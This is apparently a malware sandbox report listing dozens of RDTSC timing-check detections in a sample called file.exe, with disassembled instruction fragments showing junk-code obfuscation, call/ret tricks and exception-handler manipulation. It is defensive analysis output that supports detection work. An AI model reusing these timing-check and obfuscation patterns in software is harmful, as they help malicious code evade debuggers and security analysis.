[ebp+122D1BC1h] 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9163 second address: 4F916D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8B150D74E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9B3C second address: 4F9B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8B146BCD56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB791 second address: 4FB797 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB797 second address: 4FB79D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB79D second address: 4FB81F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007F8B150D74EEh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F8B150D74E8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov dword ptr [ebp+12460404h], edx 0x00000030 mov dword ptr [ebp+122D1CBAh], ecx 0x00000036 push 00000000h 0x00000038 movsx esi, cx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F8B150D74E8h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000017h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F8B150D74F7h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB553 second address: 4FB559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB559 second address: 4FB55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB55D second address: 4FB561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FBFF6 second address: 4FBFFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FCDA2 second address: 4FCDA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FCDA6 second address: 4FCDAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FCB59 second address: 4FCB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FD5F6 second address: 4FD5FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 504687 second address: 50468B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505692 second address: 5056A6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8B150D74E8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5056A6 second address: 5056AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50479B second address: 5047AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5047AB second address: 5047B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5047B0 second address: 504833 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8B150D74F8h 0x00000008 jmp 00007F8B150D74F2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov ebx, dword ptr [ebp+122D2889h] 0x00000016 mov dword ptr [ebp+12482082h], esi 0x0000001c push dword ptr fs:[00000000h] 0x00000023 sub dword ptr [ebp+122D1C62h], esi 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 sub dword ptr [ebp+122D1BCFh], eax 0x00000036 jnl 00007F8B150D74EEh 0x0000003c jo 00007F8B150D74E8h 0x00000042 push eax 0x00000043 pop ebx 0x00000044 mov eax, dword ptr [ebp+122D0EF1h] 0x0000004a mov bh, BDh 0x0000004c push FFFFFFFFh 0x0000004e mov bx, 84DDh 0x00000052 nop 0x00000053 jbe 00007F8B150D74FEh 0x00000059 push eax 0x0000005a push edi 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505857 second address: 5058FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F8B146BCD58h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push dword ptr fs:[00000000h] 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F8B146BCD58h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 sbb edi, 060D4AEEh 0x00000049 mov dword ptr fs:[00000000h], esp 0x00000050 jmp 00007F8B146BCD68h 0x00000055 mov eax, dword ptr [ebp+122D1509h] 0x0000005b push eax 0x0000005c mov ebx, dword ptr [ebp+122D3927h] 0x00000062 pop edi 0x00000063 push FFFFFFFFh 0x00000065 mov dword ptr [ebp+122D18F7h], edx 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F8B146BCD5Fh 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5067E2 second address: 506821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B150D74F9h 0x00000009 popad 0x0000000a jne 00007F8B150D74E8h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8B150D74F3h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 506821 second address: 506825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 506825 second address: 50682B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50AEFA second address: 50AEFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50AEFE second address: 50AF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F8B150D74E8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 jne 00007F8B150D74ECh 0x00000028 push 00000000h 0x0000002a mov bh, dl 0x0000002c push 00000000h 0x0000002e mov edi, 5C9AF717h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50AF40 second address: 50AF53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B179 second address: 50B17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E130 second address: 50E136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E136 second address: 50E13A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D217 second address: 50D21D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D21D second address: 50D223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E13A second address: 50E1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F8B146BCD58h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 movsx ebx, cx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007F8B146BCD58h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 push ebx 0x00000045 mov dword ptr [ebp+122D26ACh], eax 0x0000004b pop edi 0x0000004c call 00007F8B146BCD61h 0x00000051 xor bh, 00000040h 0x00000054 pop edi 0x00000055 push 00000000h 0x00000057 mov ebx, dword ptr [ebp+124655DAh] 0x0000005d push eax 0x0000005e jc 00007F8B146BCD60h 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 510360 second address: 510364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5111B7 second address: 5111BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5111BB second address: 5111BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51127C second address: 511283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 513326 second address: 513331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8B150D74E6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5123D7 second address: 5123DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51345A second address: 51345F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51345F second address: 5134C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D2C63h], eax 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F8B146BCD58h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov bx, di 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c cmc 0x0000003d mov eax, dword ptr [ebp+122D0B95h] 0x00000043 mov bh, 2Ah 0x00000045 push FFFFFFFFh 0x00000047 mov dword ptr [ebp+122D1DE7h], ecx 0x0000004d nop 0x0000004e jng 00007F8B146BCD6Dh 0x00000054 push eax 0x00000055 push edx 0x00000056 jno 00007F8B146BCD56h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5134C6 second address: 5134DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B150D74EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F8B150D74EEh 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515200 second address: 515222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515222 second address: 515227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514408 second address: 51440C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51440C second address: 514410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515227 second address: 51522D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519CCA second address: 519CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519CCE second address: 519CD8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8B146BCD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519CD8 second address: 519CE2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8B150D74ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51DE4C second address: 51DE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8B146BCD66h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51DE6D second address: 51DE75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51DE75 second address: 51DE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521177 second address: 52117B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A844C second address: 4A8453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A8453 second address: 4A8467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8B150D74EEh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A8467 second address: 4A846B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FBFF2 second address: 4FBFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A404 second address: 52A422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007F8B146BE726h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52ADCF second address: 52ADFD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8B14C5BA96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F8B14C5BAABh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52ADFD second address: 52AE03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52AF3F second address: 52AF43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52AF43 second address: 52AF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52AF49 second address: 52AF50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0E8 second address: 52B0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0F0 second address: 52B0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0F6 second address: 52B116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8B146BE727h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B116 second address: 52B11C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B431 second address: 52B43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B43C second address: 52B444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52EFC7 second address: 52EFCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50217B second address: 50217F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502281 second address: 502285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502285 second address: 502302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B14C5BAA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edi 0x0000000d popad 0x0000000e mov dword ptr [esp], ebx 0x00000011 mov di, E061h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov edi, dword ptr [ebp+122D273Ch] 0x00000029 mov dword ptr [ebp+12493F4Ah], esp 0x0000002f add ecx, dword ptr [ebp+122D2AC9h] 0x00000035 cmp dword ptr [ebp+122D2A31h], 00000000h 0x0000003c jne 00007F8B14C5BB4Ah 0x00000042 sub dword ptr [ebp+1246A4F9h], edx 0x00000048 mov byte ptr [ebp+122D1E4Eh], 00000047h 0x0000004f adc edx, 595A6CC1h 0x00000055 mov eax, D49AA7D2h 0x0000005a add dword ptr [ebp+1245F710h], ebx 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 je 00007F8B14C5BA98h 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50267B second address: 50267F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50267F second address: 502690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jbe 00007F8B14C5BA9Eh 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502690 second address: 341A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 mov dx, si 0x00000009 push dword ptr [ebp+122D0421h] 0x0000000f call dword ptr [ebp+122D1BC1h] 0x00000015 pushad 0x00000016 xor dword ptr [ebp+122D218Ch], ecx 0x0000001c xor eax, eax 0x0000001e jnl 00007F8B146BE725h 0x00000024 mov edx, dword ptr [esp+28h] 0x00000028 sub dword ptr [ebp+122D218Ch], edi 0x0000002e mov dword ptr [ebp+122D2B01h], eax 0x00000034 jns 00007F8B146BE71Fh 0x0000003a mov esi, 0000003Ch 0x0000003f sub dword ptr [ebp+122D218Ch], edi 0x00000045 sub dword ptr [ebp+122D218Ch], esi 0x0000004b add esi, dword ptr [esp+24h] 0x0000004f add dword ptr [ebp+122D218Ch], ebx 0x00000055 lodsw 0x00000057 jnp 00007F8B146BE71Ch 0x0000005d mov dword ptr [ebp+122D19ADh], ebx 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 jne 00007F8B146BE71Ch 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 sub dword ptr [ebp+122D218Ch], ebx 0x00000077 pushad 0x00000078 add dword ptr [ebp+122D19ADh], edx 0x0000007e add edx, 33F31554h 0x00000084 popad 0x00000085 push eax 0x00000086 push eax 0x00000087 push edx 0x00000088 pushad 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502709 second address: 50272B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push ebx 0x00000008 jmp 00007F8B14C5BA9Fh 0x0000000d pop ebx 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50272B second address: 50276E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F8B146BE718h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 jmp 00007F8B146BE71Eh 0x00000026 mov di, A291h 0x0000002a mov di, A790h 0x0000002e push D01DDA7Dh 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 push ebx 0x00000037 pop ebx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50276E second address: 502772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5028E1 second address: 502900 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], esi 0x0000000a mov dword ptr [ebp+122D1ADDh], edx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8B146BE71Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502900 second address: 502906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
